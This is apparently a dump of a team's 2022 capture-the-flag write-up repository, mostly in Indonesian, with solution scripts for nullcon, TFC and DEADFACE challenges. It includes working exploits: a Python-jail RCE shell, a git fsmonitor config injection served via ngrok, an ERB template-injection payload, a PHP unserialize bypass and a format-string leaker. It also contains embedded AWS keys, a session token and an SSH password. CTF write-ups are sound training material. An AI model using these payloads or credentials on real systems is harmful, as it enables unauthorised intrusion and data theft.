turtle.goto(int(x[i])-300, int(y[i])) 59 | while True: 60 | pass 61 | 62 | pixel_method(7, size=0.1) 63 | # pen_method() -------------------------------------------------------------------------------- /2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170611.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170611.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170634.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170634.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170647.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170647.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170726.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170726.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170742.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170742.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912171239.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171239.png -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912171311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171311.png -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Cloud 9*9/README.md: -------------------------------------------------------------------------------- 1 | Bypass Python jail: [rce.py](rce.py) 2 | Use aws credentials: [access.py](access.py) -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Cloud 9*9/access.py: -------------------------------------------------------------------------------- 1 | import os 2 | aws_creds = """ 3 | [default] 4 | AWS_DEFAULT_REGION=eu-central-1 5 | AWS_SECRET_ACCESS_KEY=Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc 6 | AWS_REGION=eu-central-1 7 | AWS_ACCESS_KEY_ID=ASIA22D7J5LEAJ27IDGC 8 | """ 9 | with open('/home/wowon/.aws/credentials', 'w') as f: 10 | f.write(aws_creds) 11 | os.system('aws s3 cp s3://nullcon-s3bucket-flag4/flag4.txt .') 12 | -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Cloud 9*9/flag4.txt: -------------------------------------------------------------------------------- 1 | ENO{L4mbda_make5_yu0_THINK_OF_ENVeryone} -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Cloud 9*9/rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import readline 3 | from base64 import b64encode 4 | import json 5 | 6 | url = "http://3.64.214.139" 7 | 8 | 9 | def comand(cmd): 10 | cmd = b64encode(cmd.encode()).decode() 11 | payload = "__import__('os').popen('echo {} | base64 -d | bash').read()".format(cmd) 12 | r = requests.post(url+"/calc", 13 | json={"input": payload,}, 14 | # proxies={'http': 'http://localhost:8080',} 15 | ) 16 | js = r.text 17 | js = json.loads(js) 18 | return js["result"] 19 | 20 | 21 | while True: 22 | cmd = input("rce> ") 23 | print(comand(cmd)) -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Cloud 9*9/set.env.sh: -------------------------------------------------------------------------------- 1 | export AWS_ACCESS_KEY_ID="ASIA22D7J5LEAJ27IDGC" 2 | export AWS_SECRET_ACCESS_KEY="Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc" 3 | export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjECwaDGV1LWNlbnRyYWwtMSJHMEUCIFcvm4jEqly0drMTbqTiCitkoGH9b0HA3QeNnvhMXlAxAiEA7PY0AeQmQRYs0GPTn8htIaeNRK1sG5sH0wkj603EL3sqggMIlf//////////ARAAGgw3NDMyOTYzMzA0NDAiDGjYTjtMMg9LXpsZfCrWAoqCIBm4zDK2GeBKddq8U0EcE+9Vo6W2Go1c8zvXUhXkEVFpYs5+B4jPkgZeh56RE5IFlaSszt4JV8rcjobHWHjKa+kqTxUTTYEvXXnIWsDNBNj/Mw8hmhoAxGw4OA2fF5VVn10QyQoTb9TlWgZ9gV1fdEEOCL31JxCqsDV7XzSlJpNr3ZCVcDP7TD/vChiYaDTDZ8wBsD+HMxTjaQzKpz45FptugStkMTevdHu5mAGba65xIOuBSsCzA2se+wqtX5nwOfqi+eTRAoUS0AoLI5+hva+d6taT8Reml35m2bmuqYTgyGm3hI733NkmuSydaNmKDlmy3/Xaa3X6VfuBlsC8CRg2VgM3Yjw6MI6vCmc58ujrkBYdDoTk/817r2IeSFrtEEqE+e9yBr3gAFriIfCvntEd7g5/Vn1ZgS1GLFYjOdnTtzgxz99cK6w7TdaEltVUXxUcbTDD99+XBjqeAbuFMFWyBlRGpbPt7LWj4nNh4ALlqQLieqat/FA1PKACtCTh/C/9ncZVh88hqgu1VJN7WUaqaL7VZkBVuu3IQ3DTv9e+XMFMMjmIFC6bfh3Hij+CVmM+QbFc20csMkzg+d1N5rLHKRPoXjlZT/ghWklVUw0DEw30rv2Z90toCZLrLXnZfSxq65f7aEvHi3Rq1GIiSgLM+yp0J7lykAgi" 4 | export AWS_DEFAULT_REGION="eu-central-1" -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Git To the Core/README.md: -------------------------------------------------------------------------------- 1 | RCE: [connect.py](connect.py) -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Git To the Core/connect.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | import re 4 | 5 | # reference: https://lwn.net/Articles/892755/ 6 | 7 | RMT = "52.59.124.14", 10001 8 | MYGIT = "http://0.tcp.ap.ngrok.io:17745/.git/" 9 | 10 | CONFIG = """ 11 | [core] 12 | repositoryformatversion = 0 13 | filemode = true 14 | bare = false 15 | logallrefupdates = true 16 | fsmonitor = "echo \\"Pwned as $(%s)\\">&2; false" 17 | """ 18 | 19 | context.log_level = "WARNING" 20 | 21 | class Exploit: 22 | def __init__(self, cmd, rmt=RMT, git=MYGIT, configTemplate=CONFIG): 23 | self.rmt = rmt 24 | self.git = git 25 | self.cmd = cmd 26 | self.configTemplate = configTemplate 27 | if not os.path.exists(".git/"): 28 | os.system("git init") 29 | 30 | def conn(self, cmd): 31 | r = remote(*RMT) 32 | r.sendlineafter(b"Please provide an URL: ", bytes(cmd, "utf-8")) 33 | return r 34 | 35 | def rceConfig(self, cmd): 36 | with open(".git/config", "w") as f: 37 | f.write(self.configTemplate % cmd) 38 | return None 39 | 40 | def start(self): 41 | self.rceConfig(self.cmd) 42 | self.conn(self.git).interactive() 43 | 44 | Exploit("cat /FLAG").start() -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Git To the Core/task.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | import subprocess 4 | import shutil 5 | 6 | print("Challenge was created with <3 by @gehaxelt.") 7 | git_url = input("Let's dump a .git/ repository from a web server of your choice. Please provide an URL: ") 8 | 9 | uid = 1500 #cloner 10 | gid = 65534 #nobody 11 | 12 | temp_dir = tempfile.mkdtemp() 13 | os.chown(temp_dir, uid, -1) 14 | 15 | # https://stackoverflow.com/questions/2699907/dropping-root-permissions-in-python/2699996#2699996 16 | os.setgroups([]) 17 | os.setgid(gid) #nobody 18 | os.setuid(uid) #cloner 19 | 20 | os.chdir(temp_dir) 21 | print("Running command: ", ' '.join(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"])) 22 | clone_output = subprocess.run(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"], capture_output=True, timeout=10, text=True) 23 | 24 | print(clone_output.stdout) 25 | print(clone_output.stderr) 26 | 27 | if os.path.exists("./repo") and os.path.isdir("./repo"): 28 | os.chdir("./repo") 29 | print("Running git checkout: ", ' '.join(["git", "checkout", "."])) 30 | checkout_output = subprocess.run(["git", "checkout", "."], capture_output=True, timeout=10, text=True) 31 | print(checkout_output.stdout) 32 | print(checkout_output.stderr) 33 | else: 34 | print("Failed to clone the repository!") 35 | 36 | os.chdir(temp_dir) 37 | shutil.rmtree(temp_dir) -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Unis Love Code/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import urllib.parse 3 | import http.server 4 | import socketserver 5 | import re 6 | import os 7 | import cgi 8 | import string 9 | from io import StringIO 10 | # from flag import FLAG 11 | FLAG = "test{flag}" 12 | 13 | 14 | class UnisLoveCode(http.server.SimpleHTTPRequestHandler): 15 | server_version = "UnisLoveCode" 16 | username = 'ADMIN' 17 | check_funcs = ["strip", "lower"] 18 | 19 | def do_GET(self): 20 | self.send_response(-1337) 21 | self.send_header('Content-Length', -1337) 22 | self.send_header('Content-Type', 'text/plain') 23 | s = StringIO() 24 | s.write("""Wait,whatisHTML?!Ishouldhavelistenedmorecarefullytotheprofessor...\nAnyhow,passwordlessisthenewhottopic,sojustprovidemethecorrectusername=viaPOSTandImightshowyoumyhomework.\nOh,incaseyouneedthesource,hereyougo:\n""") 25 | s.write("---------------------------------\n") 26 | s.write(re.sub(r"\s+", '', open(os.path.realpath(__file__), "r").read())) 27 | s.write("\n") 28 | s.write("---------------------------------\n") 29 | s.write("\nChallengecreatedwith<3by@gehaxelt\n") 30 | self.end_headers() 31 | self.wfile.write(s.getvalue().encode()) 32 | 33 | def _check_access(self, u): 34 | for cf in UnisLoveCode.check_funcs: 35 | print("getattr:"+getattr(str, cf)(UnisLoveCode.username)) 36 | print("u:"+u) 37 | if getattr(str, cf)(UnisLoveCode.username) == u: 38 | return False 39 | print("bypasses-1") 40 | for c in u: 41 | if c in string.ascii_uppercase: 42 | return False 43 | print("bypasses-2") 44 | print("u.upper:"+u.upper()) 45 | return UnisLoveCode.username.upper() == u.upper() 46 | 47 | def do_POST(self): 48 | self.send_response(-1337) 49 | self.send_header('Content-Length', -1337) 50 | self.send_header('Content-Type', 'text/plain') 51 | s = StringIO() 52 | try: 53 | length = min(int(self.headers['content-length']), 64) 54 | field_data = self.rfile.read(length) 55 | fields = urllib.parse.parse_qs(field_data.decode("utf8")) 56 | if not 'username' in fields: 57 | s.write("Iaskedyouforausername!\n") 58 | raise Exception("Wrongparam.") 59 | username = fields['username'][0] 60 | if not self._check_access(username): 61 | s.write("No.\n") 62 | raise Exception("No.") 63 | s.write(f"OK,hereisyourflag:{FLAG}\n") 64 | except Exception as e: 65 | s.write("Tryharder;-)!\n") 66 | print(e) 67 | self.end_headers() 68 | self.wfile.write(s.getvalue().encode()) 69 | 70 | 71 | if __name__ == "__main__": 72 | PORT = 8000 73 | HANDLER = UnisLoveCode 74 | with socketserver.ThreadingTCPServer(("0.0.0.0", PORT), HANDLER) as httpd: 75 | print(f"http://localhost:{PORT}") 76 | httpd.serve_forever() 77 | -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/Unis Love Code/test.py: -------------------------------------------------------------------------------- 1 | a="I" 2 | # unicode character that produce the same result as the string "ADMIN" 3 | # but is not a valid ASCII character 4 | # and if you try to compare it with the string "ADMIN" 5 | # it will return True 6 | b = "\u0131" 7 | # b = b.upper() 8 | # print(bytes(b, "utf8")) 9 | print(b) 10 | print(a==b) 11 | 12 | # payload username=admın 13 | # http://www.unicode.org/Public/UNIDATA/CaseFolding.txt -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/jsonify/flag.txt: -------------------------------------------------------------------------------- 1 | test{flag} -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/jsonify/index.php: -------------------------------------------------------------------------------- 1 | flagfile = $flagfile; 22 | } 23 | } 24 | public function __shutdown() 25 | { 26 | return $this->properties; 27 | } 28 | public function __startup() 29 | { 30 | $this->readFlag(); 31 | } 32 | public function __toString() 33 | { 34 | return "ClassFlag(" . $this->flag . ")"; 35 | } 36 | public function setFlag($flag) 37 | { 38 | $this->flag = $flag; 39 | } 40 | public function getFlag() 41 | { 42 | return $this->flag; 43 | } 44 | public function setFlagFile($flagfile) 45 | { 46 | if (stristr($flagfile, "flag") || !file_exists($flagfile)) { 47 | echo "ERROR:Fileisnotvalid!"; 48 | return; 49 | } 50 | $this->flagfile = $flagfile; 51 | } 52 | public function getFlagFile() 53 | { 54 | return $this->flagfile; 55 | } 56 | public function readFlag() 57 | { 58 | if (!isset($this->flag) && file_exists($this->flagfile)) { 59 | $this->flag = join("", file($this->flagfile)); 60 | } 61 | } 62 | public function showFlag() 63 | { 64 | if ($this->isAllowedToSeeFlag) { 65 | echo "Theflagis:" . $this->flag; 66 | } else { 67 | echo "Theflagis:[You'renotallowedtoseeit!]"; 68 | } 69 | } 70 | } 71 | function secure_jsonify($obj) 72 | { 73 | $data = array(); 74 | $data['class'] = get_class($obj); 75 | $data['properties'] = array(); 76 | foreach ($obj->__shutdown() as &$key) { 77 | $data['properties'][$key] = serialize($obj->$key); 78 | } 79 | return json_encode($data); 80 | } 81 | function secure_unjsonify($json, $allowed_classes) 82 | { 83 | $data = json_decode($json, true); 84 | if (!in_array($data['class'], $allowed_classes)) { 85 | throw new Exception("ErrorProcessingRequest", 1); 86 | } 87 | $obj = new $data['class'](); 88 | foreach ($data['properties'] as $key => $value) { 89 | $obj->$key = unserialize($value, ['allowed_classes' => false]); 90 | } 91 | $obj->__startup(); 92 | return $obj; 93 | } 94 | if (isset($_GET['show']) && isset($_GET['obj']) && isset($_GET['flagfile'])) { 95 | $f = secure_unjsonify($_GET['obj'], array('Flag')); 96 | $f->setFlagFile($_GET['flagfile']); 97 | $f->readFlag(); 98 | $f->showFlag(); 99 | } elseif (isset($_GET['show'])) { 100 | $f = new Flag(); 101 | $f->flagfile = "./flag.php"; 102 | $f->readFlag(); 103 | $f->showFlag(); 104 | } else { 105 | header("Content-Type:text/plain"); 106 | echo preg_replace('/\s+/', '', str_replace("\n", '', file_get_contents("./index.php"))); 107 | }//With<3by@gehaxelt 108 | -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/jsonify/test.php: -------------------------------------------------------------------------------- 1 | flagfile = $flagfile; 22 | } 23 | } 24 | public function __shutdown() 25 | { 26 | return $this->properties; 27 | } 28 | public function __startup() 29 | { 30 | $this->readFlag(); 31 | } 32 | public function __toString() 33 | { 34 | return "ClassFlag(" . $this->flag . ")"; 35 | } 36 | public function setFlag($flag) 37 | { 38 | $this->flag = $flag; 39 | } 40 | public function getFlag() 41 | { 42 | return $this->flag; 43 | } 44 | public function setFlagFile($flagfile) 45 | { 46 | if (stristr($flagfile, "flag") || !file_exists($flagfile)) { 47 | echo "ERROR:Fileisnotvalid!"; 48 | return; 49 | } 50 | $this->flagfile = $flagfile; 51 | } 52 | public function getFlagFile() 53 | { 54 | return $this->flagfile; 55 | } 56 | public function readFlag() 57 | { 58 | if (!isset($this->flag) && file_exists($this->flagfile)) { 59 | $this->flag = join("", file($this->flagfile)); 60 | } 61 | } 62 | public function showFlag() 63 | { 64 | echo $this->isAllowedToSeeFlag; 65 | if ($this->isAllowedToSeeFlag) { 66 | echo "Theflagis:" . $this->flag; 67 | } else { 68 | echo "Theflagis:[You'renotallowedtoseeit!]"; 69 | } 70 | } 71 | } 72 | function secure_jsonify($obj) 73 | { 74 | $data = array(); 75 | $data['class'] = get_class($obj); 76 | $data['properties'] = array(); 77 | foreach ($obj->__shutdown() as &$key) { 78 | $data['properties'][$key] = serialize($obj->$key); 79 | } 80 | return json_encode($data); 81 | } 82 | function secure_unjsonify($json, $allowed_classes) 83 | { 84 | $data = json_decode($json, true); 85 | if (!in_array($data['class'], $allowed_classes)) { 86 | throw new Exception("ErrorProcessingRequest", 1); 87 | } 88 | $obj = new $data['class'](); 89 | foreach ($data['properties'] as $key => $value) { 90 | $obj->$key = unserialize($value, ['allowed_classes' => false]); 91 | } 92 | $obj->__startup(); 93 | return $obj; 94 | } 95 | 96 | # make $this->isAllowedToSeeFlag to true, use unserialize vulnerability to get the flag, set flag value to setFlagFile('index.php'); 104 | $f->readFlag(); 105 | $f->showFlag(); 106 | // http://52.59.124.14:10002/?show=&obj={%22class%22:%22Flag%22,%22properties%22:{%22isAllowedToSeeFlag%22:%22b:1;%22,%22flagfile%22:%22s:8:\%22flag.php\%22;%22}}&flagfile=index.php 107 | ?> 108 | -------------------------------------------------------------------------------- /2022/ctf.nullcon.net/jsonify/test2.php: -------------------------------------------------------------------------------- 1 | 11 | ``` 12 | 13 | 14 | Setelah kita bypass kita mencoba salah satu common vulnerability yang biasanya terdapat dalam library WEB untuk bahasa pemrograman OOP yaitu SSTI 15 | 16 | untuk payload saya mengambil dari website ini :https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md 17 | 18 | ```python 19 | import requests 20 | import urllib.parse as up 21 | 22 | URL = "http://01.linux.challenges.ctf.thefewchosen.com:57588" 23 | class Exploit: 24 | def __init__(self, param, url=URL): 25 | self.session = requests.Session() 26 | # self.session.proxies = {'http': 'http://localhost:8080'} 27 | self.param = param 28 | self.url = url 29 | 30 | def payloadAndBypass(self, malcode): 31 | '''bypass regex expression with newline (e.g. \\n)''' 32 | bypass = "asd\n" 33 | payload = bypass+malcode 34 | return {"input":payload} 35 | 36 | def start(self): 37 | r = self.session.post(self.url, data=self.payloadAndBypass(self.param)) 38 | return r.text 39 | 40 | 41 | param = """<%= IO.popen('cat ./flag.txt').readlines() %>""" 42 | 43 | n = Exploit(param=param).start() 44 | print(n) 45 | ``` 46 | ### referensi 47 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md 48 | 49 | 50 | ## ADDING IN PARTS 51 | cat = forensics setelah di analisa, ternyata CRC nya tidak valid, kemungkinan data di dalamnya berubah, untungnya yang berubah cuman 1 bytes jadi aku buat script untuk bruteforce isi dari bytes yang berubah 52 | 53 | ```python 54 | from zipfile import BadZipFile, ZipFile 55 | 56 | strings = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_}{" 57 | a = 31 58 | flag = "" 59 | for i in range(0,22): 60 | f = open(f"{i}.zip", "rb").read() 61 | j = 0 62 | open("temp.zip", "wb").write(f) 63 | if i == 10: 64 | a = 32 65 | flag += "c" 66 | continue 67 | while len(flag) != i+1: 68 | try: 69 | zi = ZipFile("temp.zip", "r") 70 | flag += zi.read(f"{i}").decode() 71 | print("process", end="\r") 72 | except BadZipFile: 73 | f = f[:a] + strings[j].encode() + f[a+1:] 74 | open("temp.zip", "wb").write(f) 75 | j += 1 76 | 77 | print(flag) 78 | ``` 79 | ================ 80 | TFCCTF{ch3cksum2_g0od} 81 | 82 | ## GETENV 83 | 84 | Vulnerabiliy kali ini adalah format string vulnerability, dimana kita dapat me-leak flag yang terdapat di env-variable dengan cara bruteforce. 85 | 86 | Disini saya menggunakan parameter contoh `%1$s` , untuk meleak flag, itu kita lakukan berkali-kali sampai flagnya terlihat 87 | 88 | Referensi:[https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b](https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b "https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b") 89 | 90 | ```python 91 | import pwn 92 | import threading 93 | 94 | # remove debug output 95 | pwn.context.log_level = 'WARNING' 96 | 97 | def brute_format_str(num, file): 98 | with pwn.remote('01.linux.challenges.ctf.thefewchosen.com', 58846) as r: 99 | try: 100 | payload = f"%{num}$s" 101 | p = r.recv(1000) 102 | p = r.sendline(payload) 103 | p = r.recv(1000) 104 | except: 105 | pass 106 | try: 107 | file.write(p) 108 | except: 109 | pass 110 | 111 | 112 | with open("dump.txt", "ab") as f: 113 | for i in range(0,100): 114 | t = threading.Thread(target=brute_format_str, args=(i,f)) 115 | t.start() 116 | if i % 10 == 0: 117 | t.join() 118 | ``` -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016084856.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084856.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016084906.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084906.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016084928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084928.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085136.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085136.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085148.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085148.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085202.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085202.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085210.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085210.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085502.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085502.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016085646.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085646.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090134.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090134.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090147.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090147.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090154.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090154.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090238.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090238.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090243.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090243.png -------------------------------------------------------------------------------- /2022/deadface-ctf/Pasted image 20221016090323.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090323.png -------------------------------------------------------------------------------- /2022/deadface-ctf/README.md: -------------------------------------------------------------------------------- 1 | # OSINT 2 | ## Under Public Scrutiny 3 | Cukup dari keyword github di https://ghosttown.deadface.io/ 4 |  5 | 6 | ketemu thread ini: [https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66](https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66 "https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66") (edited) 7 | 8 | katanya akun githubnya deadf4c3 9 | ada 1 repo sus, got flag https://github.com/deadf4c3/tarrasque 10 | 11 | ## Grave Digger 1 12 | 13 | Untuk challenge ini kita perlu ssh ke user crypto\_vamp lalu ketik env 14 | 15 | ``` 16 | crypto_vamp@1d2d67359e3a:/proc$ env 17 | GRAVEDIGGER1=flag{d34dF4C3_en1roN_v4r} 18 | HOSTNAME=1d2d67359e3a 19 | PWD=/proc 20 | HOME=/home/crypto_vamp 21 | TERM=xterm 22 | TMOUT=1600 23 | SHLVL=1 24 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 25 | _=/usr/bin/env 26 | OLDPWD=/ 27 | ``` 28 | 29 | # REV 30 | ## Monstrosity 31 | Diberikan file binary, disini yang unik adalah program tersebut sectionnya di encrypt dan akan didecrypt runtime. Cukup dump menggunakan gdb dan dapet binary yg bisa dianalisis 32 | 33 |  34 | 35 | program akan meminta input dan melakukan cek dengan input tersebut: 36 | 37 |  38 | 39 | bisa dilihat, input user akan dicompare dengan var v13 40 | dimana disini var v13 diencrypt dengan xor 0x1e: 41 | 42 |  43 | 44 | setelah decrypt dengan saibersep, dapet jawabannya and got flag 45 | 46 |  47 | 48 | ## Cereal Killer 02 (REV) 49 | Diberi program .NET yang dimana disini flag diencrypt dengan aes menggunakan jawaban. validasi jawab disini menggunakan md5, dimana md5nya adalah aee1ee5262757cf67b619ff63e9672b6, setelah menggunakan crackstation untuk mencari jawabannya, dapet hasil peanutbuttercrunch. Enter the flag and boom got flag 50 |  51 | 52 |  53 | 54 | 55 | # PWN 56 | ## Easy Creds 57 | untuk soal ini kita hanya perlu menggunakan john 58 | 59 | ```bash 60 | john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt 61 | ``` 62 | 63 | untuk identifiernya saya menggunakan https://hashes.com/en/tools/hash_identifier 64 | 65 | ## Crack Database 66 | diberikan sebuah file keepas, kita akan crack dengan john, masalahnya wordlist yg dipake gatawu, 67 | 68 | kita coba cari di ghostown https://ghosttown.deadface.io 69 | ternyata pada post More Bitcoin`$$$$$` user bernama mirveal memberikan wordlists, kita coba gunakan itu untuk membuka crack passwordnya.. 70 | didapatlah passwordnya complexpassword 71 | 72 | buka di keepass copy password pada title PWN07-.... 73 | flag{breaking_the_law} 74 | 75 |  76 | 77 |  78 | 79 |  80 | 81 | ## Grave Digger 2 82 | 83 | kita perlu masuk menggunakan ssh dari grave digger 1 84 | 85 | ``` 86 | ssh crypto_vamp@env.deadface.io 87 | # password: 123456789q 88 | ``` 89 | 90 | read file gravedigger2 menggunakan 91 | 92 | ``` 93 | /opt/reader -f gravedigger2 94 | ``` 95 | 96 | maka nanti akan muncul qr code, setelah itu kita scan qrcodenya dan nanti akan mendapatkan flagnya. 97 | 98 | # crypto 99 | ## Two Dead Boys 100 | 101 | diberikan string yang di encrypt vigenere 102 | 103 | "qlsn{Pvelnnad Aumjcnyg: Ibrwpaty ENLECPZNYG!}" 104 | 105 | karena kita sudah tahu 4 huruf pertama maka kita dapat memanfaatkan fitur known plaintext di dcode.fr tinggal pake mode bruteforce saja maka flag muncul 106 | 107 | flag{Critical Thinking: Question EVERYTHING!} 108 | 109 | ## "D" is for Dumb Mistakes 110 | 111 | p = 1049 112 | q = 2063 113 | e = 777887 114 | 115 | untuk dapat d atau privatekey kita bisa menggunakan fungsi inversemod pada gympy2 atau make dcode.fr 116 | 117 | N = (p-1)*(q-1) 118 | d = (e,N) 119 | d = 1457215 120 | 121 | flag{d=1457215} 122 | 123 | ## "D" if for Decryption 124 | 125 | masih berhubungan dengan soal pertaam tapi kali ini kita diberikan cipher text untuk di decrypt yang mana hasilnya anggka yang direpresentasikan urutan alphabet 126 | 127 | untuk scriptnya 128 | ```python 129 | from Crypto.Util.number import inverse, long_to_bytes 130 | 131 | p = 1049 132 | q = 2063 133 | e = 777887 134 | d = 1457215 135 | n = p*q 136 | 137 | data = [992478,1726930,1622358,1635603,1385290] 138 | 139 | flag = [] 140 | for i in data: 141 | flag +=long_to_bytes(pow(i,d,n)) 142 | 143 | print('flag{',end="") 144 | for i in flag: 